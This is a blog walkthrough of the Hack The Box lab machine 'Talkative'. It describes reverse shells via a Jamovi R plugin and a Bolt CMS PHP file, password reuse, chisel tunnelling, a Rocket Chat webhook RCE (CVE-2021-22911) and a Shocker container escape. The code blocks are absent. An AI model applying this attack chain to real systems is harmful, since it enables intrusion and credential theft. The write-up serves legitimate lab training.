šŸ”ŽšŸ¦¶Enumeration/Foothold

I start every box by setting a variable to the boxes IP and runningĀ rustscanĀ intoĀ xsltprocĀ for an easy to read initial scan:

Copy

Reviewing the initial results I can seeĀ Port 80Ā open so I head over to the website. It redirects me toĀ talkative.htbĀ so I add it to my host file.

Talkative website showing lots of juicy details.

Talkative website showing lots of juicy details.

I have to give some kudos to both authors for going the extra mile (especially TheCyberGeek) and taking the time to make it feel like an actual company website with real sentences. So many boxes are boilerplate templates and miss the initial OSINT.

I see a few possible usernames and their profile page showsĀ [email protected]Ā as the email. I note all three users and continue. At the footer of the page I notice that theĀ ProductsĀ menu goes to additional links. I also notice that theĀ Talkative.htbĀ link goes to
Bolt CMS. I can see anĀ /boltĀ page endpoint confirming this but I will leave that till later.

Heading over to theĀ TALK-A-STATS (Coming Soon)Ā page I can seeĀ JAMOVIĀ is listed, the application talks about data entry (possible entry point) and has a ‘beta’ version available:

TALK-A-STATS mentioning Jamovi and a 'Beta' version.

TALK-A-STATS mentioning Jamovi and a 'Beta' version.

The link takes me toĀ Port 8080Ā and immediately I see the following:

TALK-A-STATS application states it has a security issue.

TALK-A-STATS application states it has a security issue.

Clicking the three dots in the top-right corner I can see the version isĀ 0.9.5.5. I Google around and navigate around the application. I findĀ Rj EditorĀ and see that a plugin to runĀ rubyĀ code is installed:

Plugin states you can run R code inside jamovi.

TALK-A-STATS application states it has a security issue.

I went down the šŸ°šŸ•³ļø for a while and eventually found this articleĀ Ethz – R-ManualĀ which allowed me to get a reverse shell on the box.

Running a bash one-liner and catching the reverse shell.

Running a bash one-liner and catching the reverse shell.

I’ve been usingĀ pwncatĀ more and more recently which came in handy as it allowed me to download theĀ bolt-administration.omvĀ file from the box locally:

Copy

Inside theĀ xdata.jsonĀ file I find a few usernames/passwords:

I try the passwords against the services I’ve seen so far and get a hit at the login to theĀ Bolt CMS admin page. Once I was logged in I went toĀ Settings > Configuration > Main ConfigurationĀ to see if database credentials were available. Next I went toĀ Settings > Configuration > All Configuration FilesĀ and noticed aĀ bundles.phpĀ file.

Copy

šŸ”Escalation to Root

I went into the file and put aĀ PHPĀ one-liner and started aĀ pwncatĀ listener. I then navigated to:Ā bundles.phpĀ to grab the shell. On the container I useĀ pwncatĀ to uploadĀ LinPEASĀ to the box and proceeded to do a scan. I instantly notice:

I pulledĀ pingĀ to the box and ran a loop. I then proceed to poke atĀ 172.18.0.1Ā until I got a hit forĀ SSH. Password re-use provided access as the same password for bolt provided my access:

Copy

I usedĀ pwncatĀ to uploadĀ LinPEASĀ to theĀ SSHsession. I ran a loud scan but didn’t see anything useful. I decided to uploadĀ pspyĀ next to see if anything was running in the background:

I can see anĀ update_mongo.pyĀ script running. Looking at the theĀ MonoDB documentationĀ I can see the default ports listedĀ 27017 – 27020. I usedĀ LinPEASĀ alongside its host/port scan capabilities to find the database:

Copy

I then usedĀ chiselĀ to forward the port to my local machine:

Copy

Saul Session

Copy

Attacker Session

Copy

Once the connection was in place I šŸ˜­ for a moment realizing it requiredĀ anotherĀ tool to connect to this database. I found these instructionsĀ HERE, ignored them and found a single command for a deprecated tool (tool still works so proceeding with it šŸ˜!):

Copy

Reviewing the results I could now see this database was being used for the Rocket Chat application which I had seen before inĀ HTB Paper. I referred to the linkĀ HEREĀ to reset the password.

Logged into Rocket Chat as the Admin account.

Logged into Rocket Chat as the Admin account.

The first thing I did was look for the version number as I saw no chats/channels available:

Rocket Chat version information.

Rocket Chat version information.

After some research I foundĀ CSEnox – CVE-2021-22911Ā ANDĀ THISĀ which showed I could get RCE by using a web hook. The process was pretty straight forward once I understood the script wasĀ Nodejs.

šŸ„‡First

Copy

šŸ„ˆSecond

Building a WebHook by going to Administration > Integration > Incoming WebHook.

Building a WebHook by going to Administration > Integration > Incoming WebHook.

Finalizing the WebHook with my reverse shell.

Finalizing the WebHook with my reverse shell.

šŸ„‰Third

Send the full curl well make sure to have your listener running to catch the shell.

Once on the Box I ranĀ LinPEASĀ andĀ LinEnumĀ and discovered the box was vulnerable toĀ Shocker. I altered the script to pull the root flag and compiled it. I then uploaded the binary to the box and ran it for the flag. This part is currently not documented (but will be when I’m feeling less lazy).

Rooted

Published On: August 24th, 2022 / Categories: HTB, Technology / Tags: , , , , , , , , , /

One Comment

  1. Christopher Soehnlein 1st July 2022 at 12:12 pm

    I’ve been super busy with life (job, getting married, etc.) that I haven’t been actively writing guides. I have notes for Noter, StreamIO, Trick, Scrambled and Carpediem (ongoing) that I will be publishing on my site in due course.

Leave A Comment